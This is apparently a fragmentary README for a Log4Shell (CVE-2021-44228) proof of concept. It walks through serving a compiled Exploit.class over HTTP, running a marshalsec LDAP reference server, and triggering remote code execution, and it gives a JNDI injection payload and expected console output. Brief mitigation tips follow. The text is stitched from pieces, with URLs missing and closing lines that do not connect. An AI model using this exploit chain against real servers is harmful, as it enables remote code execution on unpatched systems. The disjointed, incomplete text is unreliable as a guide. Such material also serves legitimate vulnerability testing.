The version of 1.x have other vulnerabilities, we recommend that you update the latest version.
Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)
download this project, compile the exploit code blob/master/src/main/java/, and start a webserver allowing downloading the compiled binary.
git clone
cd CVE-2021-44228-Apache-Log4j-Rce
# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888
# make sure python webserver is running the same directory as Exploit.class, to test
curl -I
download another project and run LDAP server implementation returning JNDI references
git clone
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""
build and run the activation code (simulate an log4j attack on a vulnerable java web server) blob/master/src/main/java/, and your calculator app will appear.
cd CVE-2021-44228-Apache-Log4j-Rce
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j
# expect the following
# 1. calculator app appear
# 2. in ldapserver console,
# Send LDAP reference result for Exploit redirecting to
# 3. in webserver console,
# - - [....] "GET /Exploit.class HTTP/1.1" 200 -
Do not rely on a current Java version to save you. Update Log4 (or remove the JNDI lookup). Disable the expansion (seems a pretty bad idea anyways).
For example:
${jndi:ldap:// badClassName}
Don't trust the web application firewall.
Lookups provide a way to add values to the Log4j configuration at arbitrary places.
The methods to cause leak in finally
If you want to do black-box testing, I suggest you do passive scanning.